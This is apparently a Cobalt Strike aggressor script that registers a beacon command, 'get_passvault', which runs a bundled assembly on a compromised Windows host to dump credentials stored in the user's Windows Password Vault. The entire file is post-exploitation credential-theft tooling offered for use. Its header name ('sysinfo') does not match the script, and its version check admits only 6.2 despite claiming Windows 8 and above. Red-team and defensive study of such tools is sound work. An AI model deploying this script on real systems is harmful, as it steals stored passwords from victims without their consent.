# sysinfo
# Author: @carlos_perez
# Email: carlos_perez@darkoperator.com
# Date: 11/18/18
# Notes: Script for pulling stored credentials under a user context from the Passwoed Vault of Windows 8 and above. Based on https://github.com/HanseSecure/credgrap_ie_edge

alias get_passvault{
	$ver   = binfo($1, "ver");
	if ($ver == "6.2") { 
		bexecute_assembly($1, script_resource("passvault.exe"),"");
	} else {
		blog($1, "This version of Windows is not supported.");	
	}
}

beacon_command_register(
	"get_passvault", 
	"Get credentials stored in the Windows Password Vault.", 
	"Synopsis: get_passvault]\n\ncredentials stored in the Windows Password Vault. Works on Windows 8 and above.\nEdge and other applications store credentials in the password vault.");
